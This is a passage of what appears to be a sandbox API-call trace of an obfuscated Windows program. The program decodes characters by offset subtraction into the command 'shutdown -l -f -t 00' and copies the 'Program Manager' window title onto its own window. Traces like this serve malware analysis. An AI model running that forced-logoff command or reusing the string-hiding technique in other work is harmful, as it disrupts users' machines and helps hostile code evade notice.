lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.415] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.415] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.416] GetForegroundWindow () returned 0x20086 [0181.416] GetLastError () returned 0x0 [0181.416] SysStringLen (param_1=" ") returned 0xff [0181.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0181.416] SysStringLen (param_1=" ") returned 0xff [0181.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0181.416] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0181.417] GetLastError () returned 0x0 [0181.417] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0181.417] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0181.418] SysStringLen (param_1="Program Manager") returned 0x10 [0181.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Program Manager", cchWideChar=17, lpMultiByteStr=0x1146e74, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Program Manager", lpUsedDefaultChar=0x0) returned 17 [0181.418] SetWindowTextA (hWnd=0x103c4, lpString="Program Manager") returned 1 [0181.418] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0181.419] GetFocus () returned 0x0 [0181.419] lstrlenA (lpString="Program Manager") returned 15 [0181.419] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1146e74) returned 0x1 [0181.419] IsWindow (hWnd=0x103c4) returned 1 [0181.419] IsWindow (hWnd=0x103c4) returned 1 [0181.420] IsWindow (hWnd=0x103c4) returned 1 [0181.420] IsWindow (hWnd=0x103c4) returned 1 [0181.420] GetFocus () returned 0x0 [0181.421] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0181.421] GetFocus () returned 0x0 [0181.421] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10e1d20 [0181.421] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x10, lParam=0x10e1d20) returned 0xf [0181.421] GetFocus () returned 0x0 [0181.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0181.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x1146e74, cchWideChar=16 | out: lpWideCharStr="Program Manager") returned 16 [0181.422] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0181.422] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.424] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0181.424] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.425] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.425] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.426] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.426] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.427] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.427] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.476] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.476] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.477] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.477] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.478] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0181.478] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.479] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.479] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.480] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.480] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.481] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.481] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.482] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.482] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.483] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.483] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.483] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.484] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.484] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.485] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.485] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0181.485] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.486] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.486] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.487] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.487] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.488] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0181.488] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.489] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.489] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.490] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.490] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.491] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.491] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.494] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.495] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.495] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.496] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.496] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.497] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.497] GetForegroundWindow () returned 0x20086 [0181.497] GetLastError () returned 0x0 [0181.497] SysStringLen (param_1=" ") returned 0xff [0181.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0181.497] SysStringLen (param_1=" ") returned 0xff [0181.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0181.498] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0181.498] GetLastError () returned 0x0 [0181.498] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0181.498] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0181.499] SysStringLen (param_1="Prog") returned 0x4 [0181.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Prog", cchWideChar=5, lpMultiByteStr=0x116859c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Prog", lpUsedDefaultChar=0x0) returned 5 [0181.499] SetWindowTextA (hWnd=0x103c4, lpString="Prog") returned 1 [0181.500] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0181.500] GetFocus () returned 0x0 [0181.500] lstrlenA (lpString="Prog") returned 4 [0181.500] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0181.501] IsWindow (hWnd=0x103c4) returned 1 [0181.501] IsWindow (hWnd=0x103c4) returned 1 [0181.502] IsWindow (hWnd=0x103c4) returned 1 [0181.502] IsWindow (hWnd=0x103c4) returned 1 [0181.503] GetFocus () returned 0x0 [0181.503] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0181.504] GetFocus () returned 0x0 [0181.504] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0181.504] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0181.504] GetFocus () returned 0x0 [0181.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0181.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=5 | out: lpWideCharStr="Prog") returned 5 [0181.505] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0181.505] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.512] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0181.512] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.513] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x116863c, 